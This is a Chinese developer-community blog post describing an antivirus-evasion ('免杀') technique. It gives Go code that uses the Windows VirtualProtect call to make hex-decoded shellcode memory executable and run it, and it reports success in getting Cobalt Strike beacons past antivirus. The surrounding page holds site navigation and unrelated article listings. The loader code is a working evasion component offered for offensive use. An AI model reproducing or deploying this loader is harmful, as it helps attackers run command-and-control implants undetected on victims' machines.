AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

我的免杀之路:虚拟保护

2021-12-06 761
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。

简述


虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。说明白点,它的作用就是改变调用进程的一段页的保护属性,如果想要改变其他进程,就需要用到 VirtualProtectEx 函数。这里,我利用 VirtualProtect 函数将 shellcode 所在内存区域设置为可执行模式,并且设置好 shellcode 所在内存起始地址以及内存原始属性类型保存地址,这样的 shellcode 内存区域被设置成可执行模式后,shellcode 就会被正常执行了。


实现思路


关于VirtualProtect函数代码如下:

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {

ret, _, _ := procVirtualProtect.Call(

uintptr(lpAddress),

uintptr(dwSize),

uintptr(flNewProtect),

uintptr(lpflOldProtect))

return ret > 0

}


简单的解释下以上的参数

lpAddress:要改变属性的内存起始地址(shellcode所在内存空间的起始地址)

dwSize:要改变属性的内存区域大小(shellcode长度大小)

flNewProtect:内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行。(此值为0x40)

备注:为什么是0x40,这个值怎么来的。下方链接有介绍哈,这里我简单解释一下。这是填的是内存保护常数,常数的值不同所对应的功能也不一样,对照链接里面的描述,因为现在我需要这个内存区域的可执行权限和写权限,所以这里的值必须得是0x40才能满足我的需求。

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

lpflOldProtect:内存原始属性类型保存地址。


再来看看核心代码部分:

func ShellCodeVirtualProtect(sc string) {

f := func() {}

var oldfperms uint32

if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {

panic("Call to VirtualProtect failed!")

}

ds, _ := hex.DecodeString(sc)

**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&ds))

var oldshellcodeperms uint32

if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&ds))), uintptr(len(ds)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {

panic("Call to VirtualProtect failed!")

}

f()

}


可见其核心就是利用 VirtualProtect 函数实现,ds 就是 shellcode。如果函数成功,则返回值非零。如果函数失败,则返回值为零。

 

最后的CS上线免杀效果:

图片1.png

图片2.png

图片3.png


参考资料:

https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

https://blog.csdn.net/weixin_34004576/article/details/90360650

https://blog.csdn.net/zacklin/article/details/7478118



文章标签:
Windows
API
Snaker
目录
相关文章
Linux开发架构之路
|
运维 算法 网络协议
2022年嵌入式开发想进互联网大厂,你技术过硬吗?
2022年嵌入式开发想进互联网大厂,你技术过硬吗?
Linux开发架构之路
114 0
Linux开发架构之路
|
Unix Java Linux
深入剖析计算机底层原理,打开技术的大门
深入剖析计算机底层原理,打开技术的大门
Linux开发架构之路
102 0
土木林森
|
5月前
|
存储 算法 NoSQL
天呐!汇编语言竟如此神奇,从零到精通的学习指南带你开启计算机世界神秘大门!
【8月更文挑战第31天】汇编语言是一种底层编程语言,直接与硬件交互,对于理解计算机体系结构和底层原理至关重要。尽管现代软件开发中较少使用,但学习汇编语言有助于深入了解计算机如何执行指令、管理内存和处理数据,从而优化程序性能,进行底层系统开发和调试。不同处理器有不同指令集,如 x86 和 ARM,掌握这些指令集及寄存器、内存地址等基本概念是学习汇编语言的基础。通过简单示例开始,逐步掌握复杂指令和调试工具,可以大大提高编程技能和解决问题的能力。
土木林森
87 1
肾透侧视攻城狮
|
2月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
75 0
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
肾透侧视攻城狮
|
2月前
|
安全 算法 网络协议
网络空间安全之一个WH的超前沿全栈技术深入学习之路(六:保姆级教会你如何对Kali本地网络配置、 sshd 服务并使用 xshell 连接:就怕你学成黑客啦!)作者——LJS
保姆级教会你如何对Kali本地网络配置、 sshd 服务并使用 xshell 连接
肾透侧视攻城狮
53 0
肾透侧视攻城狮
|
2月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9-2):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
93 0
肥猪肥猪-17824
|
8月前
|
算法 搜索推荐 开发工具
探索代码的奥秘:技术感悟与实践探索操作系统的心脏:内核
【5月更文挑战第31天】在数字世界的编织中,每一行代码都承载着创造者的智慧和汗水。本文将带你深入编程的核心,揭示那些隐藏在日常开发实践中的技术真谛。从算法的精妙到系统的架构,我们将一同探讨如何通过技术提升效率,解决问题,并在这个过程中获得个人成长。 【5月更文挑战第31天】本文深入剖析了操作系统的核心组件——内核,探讨了其设计哲学、功能职责以及在现代计算环境中的重要性。通过分析内核的工作原理和它如何与硬件、软件交互,我们将揭示这个隐藏在用户界面背后的力量之源。
肥猪肥猪-17824
45 0
幼稚十一
|
8月前
【计网·湖科大·思科】实验一 熟悉仿真软件及访问WEB服务器
【计网·湖科大·思科】实验一 熟悉仿真软件及访问WEB服务器
幼稚十一
80 0
愿天堂没有BUG(公众号同名)
|
程序员 Linux
不愧是华为内部的“操作系统学习笔记”,一篇说细节,一篇讲哲学
当然重要,身为程序员的我们,那更应该深刻理解和掌握操作系统,虽然我们日常 CURD 的工作中,即使不熟悉它们,也不妨碍我们写代码,但是当出现问题时,没有这些基础知识,你是无厘头的,根本没有思路下手,这时候和别人差距就显现出来了,可以说是程序员之间的分水岭。
愿天堂没有BUG(公众号同名)
90 0
matches999
|
人工智能 算法 架构师
计算机学习路线规划,和我一同打开计算机学习的大门吧!
计算机学习路线规划,和我一同打开计算机学习的大门吧!
matches999
235 0
计算机学习路线规划,和我一同打开计算机学习的大门吧!

热门文章

最新文章

  • 1
    【实战】锐捷AC+AP配置WLAN基本服务系列
  • 2
    Tomcat 7.0 64位免安装解压版 安装及配置
  • 3
    丰富、连接、待集成—MaxCompute 生态再出发
  • 4
    securecrt克隆会话与sshd 的 MaxSessions
  • 5
    svelte教程(3)props
  • 6
    XP高仿win7宽栏风格主题
  • 7
    Silverlight实用窍门系列:62.Silverlight中的Action动作TargetedTriggerAction、TriggerAction
  • 8
    heartbeat-gui
  • 9
    谈谈ILDasm的功能限制与解除
  • 10
    UIWebView体系结构(八)各个Client综述
  • 1
    欢迎使用Dataphin,开启您的智能数据治理之旅!
    97
  • 2
    《模型压缩与量化:提升性能与降低成本的关键策略》
    24
  • 3
    《预训练语言模型:开启智能时代的大门》
    22
  • 4
    《词嵌入技术:开启文本理解的大门》
    19
  • 5
    《探索人工智能的多元学派:符号主义、连接主义与行为主义》
    22
  • 6
    《解密奖励函数:引导智能体走向最优策略》
    25
  • 7
    预编译为什么能防止SQL注入?
    17
  • 8
    探索Wiki:开源知识管理平台及其私有化部署
    25
  • 9
    深入解析 Hologres Table Group 与 Shard Count
    81
  • 10
    1.1 学习Python操作Excel的必要性
    20

    • 相关课程

    更多
  • 场景实践-新手玩转云计算-搭建Linux学习环境
  • 场景实践- 新手玩转云计算-创建炫酷的简历网页
  • 机器阅读技术与应用
  • 面向运维的 python 脚本速成-1024程序员节创造营公益课
  • 场景实践 -新手玩转云计算制作一个浪漫的表白网页
  • 云计算工程师解析与实战-网络专家篇(体验版)

    • 相关电子书

    更多
  • 移动虚拟化:360分身大师那些事
  • 遇见双创 · 预见未来
  • 遇见双创·预见未来

    • 相关实验场景

    更多
  • 每个IT人都想学的“Web应用上云经典架构”实战
  • 基于函数计算快速搭建Zblog等传统应用框架
    • 下一篇
    阿里云无影云电脑免费试用,最长可试用3个月